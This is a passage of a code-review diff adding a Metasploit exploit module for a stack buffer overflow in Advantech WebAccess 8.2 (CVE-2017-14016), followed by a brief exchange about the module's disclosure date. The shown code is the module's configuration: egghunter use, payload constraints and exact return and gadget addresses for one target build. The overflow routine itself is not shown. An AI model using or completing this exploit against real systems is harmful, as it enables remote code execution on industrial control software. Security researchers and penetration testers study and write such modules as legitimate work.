modules/exploits/windows/scada/advantech_webaccess_webvrpcs_bof.rb

```diff
@@ -0,0 +1,179 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Egghunter
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack buffer overflow in Advantech WebAccess 8.2.
+          By sending a specially crafted DCERPC request, an attacker could overflow
+          the buffer and execute arbitrary code.
+      },
+      'Author'         => [ 'mr_me <steven@srcincite.io>' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'ZDI', '17-938' ],
+          [ 'CVE', '2017-14016' ]
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Payload'        =>
+        {
+          'Space'    => 2048,
+          'BadChars' => "\x00",
+        },
+      'Platform' => 'win',
+      'Targets'  =>
+        [
+          [ 'Advantech WebAccess 8.2-2017.03.31',
+            {
+              'Ret'   => 0x07036cdc,  # pop ebx; add esp, 994; retn 0x14
+              'Slide' => 0x07048f5b,  # retn
+              'Jmp'   => 0x0706067e   # pop ecx; pop ecx; ret 0x04
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Dec 25 2017',
```

Comment:
Is this disclosure date correct?

Reply:
Merry Christmas! I will fix it, it was my guesstimate on when the 0d will get patched and released. Pretty close guess!